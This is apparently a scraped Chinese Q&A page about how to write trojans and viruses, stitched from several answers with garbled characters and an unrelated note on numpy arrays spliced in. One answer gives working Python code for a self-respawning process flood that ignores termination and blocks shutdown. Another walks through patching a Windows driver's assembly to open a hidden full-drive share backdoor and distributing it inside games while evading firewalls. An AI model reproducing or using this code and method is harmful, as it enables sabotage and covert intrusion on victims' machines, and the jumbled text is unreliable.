锐客网

  1. 首页 > 睿知 > >

木马程序怎么编写python,如何编写木马病毒程序

经验分享睿知

1,如何编写木马病毒程序去问360工作人员看它们是否会告诉你学习yi语言吧,很快就回了、编写木马很简单的,最困难的就是免杀,反编汇了
2,木马程序的编写详细的说1年也说不完 , 你去黑客x档案论坛看和下工具 。或其他黑客论坛,也可以买一些这类的书 。一些厉害木马病毒的编辑者都是自学成才 。没有可以用高级语言比如C语言?。劣谏彼滥韭淼某绦?。........当然是杀毒软件拉..其实就是一个个对比,看到相似的就杀...记得有个能自动杀毒或木马的程序...你可以去找找可以,杀毒软件不就是可以杀死木马的程序吗
3 , python能写病毒或者木马什么的吗# 这是一个小病毒,名叫ComKiller(计算机杀手)# 效果:运行约10秒后无法正常关机# 注:把那两行 time.sleep(0.1) 去掉效果更好哦:)import osimport signalimport ctypesimport timeimport threadingfrom pathlib import Pathdef help_sos(): cmdr = os.system("start python %s" % FileName)def Error(): while True:try:help_sos()except BaseException:help_sos()time.sleep(0.1)signal.signal(signal.SIGTERM, help_sos)FileName = Path(__file__).namewhile True: time.sleep(1) T = threading.Thread(target = Error, args = ()) T.start()#仅用于娱乐,干什么非法的事情和我无关!Python写个破坏Windows系统的代码轻而易举能python自己没有array这个数据结构 。据我所知array是python的numpy工具包定义的 。python的list就是常说的列表 。array和list主要的不同是,因为numpy是一个数值计算工具包 , numpy的很多函数是可以直接在array上使用的,但不能用在list上 。可以 。但是win上有python的人少,mac和linux虽然默认有python但是这两种系统比win要安全 , 所以实际上用python写malware的情况很少很少 。【木马程序怎么编写python,如何编写木马病毒程序】
4 , 木马是怎么编写的教你做木马网上木马程序很流行,其实说来也很简单,大致都是修改注册表或者INI文件加载一个文件提供服务,这就手工都很容易检测出木马来 。一,看增加的不明服务 。二,因为木马是作为服务一般要打开一个网络通信端口 , 所以检查增加的服务端口也很容易检查出木马程序来 。其实完全可以稍微改动操作系统内核而作出一个很好的木马来,这样不用改动注册表也可以让用户很不容易发觉 。下面就是简单改动一个驱动程序做一个木马的方法 。大家可以分析别的驱动程序相应的作出自己的木马来 。这儿是利用WINDOWS的共享和远程管理 。WINDOWS的共享如果共享名是ADMIN$就可以远程管理,就是登陆ADMIN$进去了后所有的盘都完全共享为盘符加$.下面一段就是VSERVER 。VXD处理共享的一段程序,SUB_0027校验密码,密码对了后后面检测共享名是ADMIN $否,是就看C$,D$...共享没有(DATA_0431==0?),没共享就调用SUB_0230共享 , SUB_0230 一个参数就是密码指针,如果密码指针为0就没密码 。这儿为了好改动就用的这个参数 。显然我们就可以必要的时候调用SUB_0230就开了个后门 。LOC_0415是检测网络通信的共享名串大于0DH否(包括串后的0),是就转LOC_0419出错返回 , 显然我们可以利用这儿去调用SUB_0230. 看LOC_0419 有7个字节可以利用,可以安排 CALL SUB_0230NEW_LOC_0418 POP eax jmp 03469刚好7个字节 。3436: JE LOC_0418 是没找到要共享的目录跳转到LOC_0418 显然要改动 , 改动成JE NEW_LOC_0418 就可以 。现在是LOC_0415一段要跳转到LOC_0419前要PUSH 0以调用SUB_0230 。下面是LOC_0415的改法:LOC_0415:03415 XOR EAX,EAX ;2 字节,同样SUB AL , AL 得到AL=0;还得到EAX=0 。03417 PUSH EAX ;1 字节 调用SUB_0230 用的DWORD参数 0;03418 XOR ECX,ECX ;2 字节 ECX=0;0341A DEC ECX ;1 字节 得到ECX=0FFFFFFFFH这儿与MOV ECX,0FFFFH一样但字节数少0341B mov edi,ebx ;2 bytes0341D repne scasb ;2 bytes 0341F SUB EDI,EBX ;2 bytes get the share name long03421 CMP EDI, 0Dh ;3 bytes大于等于0DH跳转 。这儿条件可以改动为等于多少跳转等 。03424 ja short loc_0419 ; 2 byte 03426 POP EAX ;1 byte 堆栈平衡 03427 PUSH EDI ;1 byte03428 POP EAX ;1 byte EAX=EDI SHARE NAME LONG , 后面要用 刚好字节够用,注意DATA_0182 那儿有重定位那种字节不能简单改动 。你可以把你的好的程序好的游戏加上一小段代码这么改动他的VSERVER 。VXD文件 , 最好是硬盘的WINDOWS安装目录打包文件里面的VSERVER 。VXD也改动,还有访问共享目录\\IP的139端口也最好加一个别的端口以逃避有些路由器防火墙的设置,再把你的程序散发 。。。。。中了你的木马的你访问他的共享目录后面加一大串字母(共享名串长大于等于0DH)会提示出错,但你就可以再访问\\IP\C$, \\IP\D$....了,这可是完全共享的了.如果你先没有那个一大串字母的访问他也没有设置远程管理的话 \\IP\C$,\\IP\D$... 都不能访问的,他自己用网络监视器也看不到这种共享的,所以很不容易觉察的 。注意你进入共享目录了网络监视器还是能看到 。木马?现在写一个木马都要精通汇编才行,因为高级语言不适合写木马,写木马要非常底层的东西,我记得有一个病毒,是直接破坏计算机硬件的 , 就是用汇编写的叫CIM病毒 台湾一个大学生制造的 假如你学过的话你用.bat+vb 也可以写 。关键你不会 。。你要可以去下载一些脚本书籍 。看下语法的应用 。然后靠你自己来写 。会编程的人才能编吧用编程的软件编写

    推荐阅读


    上一篇:安卓手机怎么一键安装,通过二维码安装安卓手机需准备什么?

    下一篇:元气骑士最新版官方,元气骑士破解版2021最新版血蓝不无限总是闪退怎么办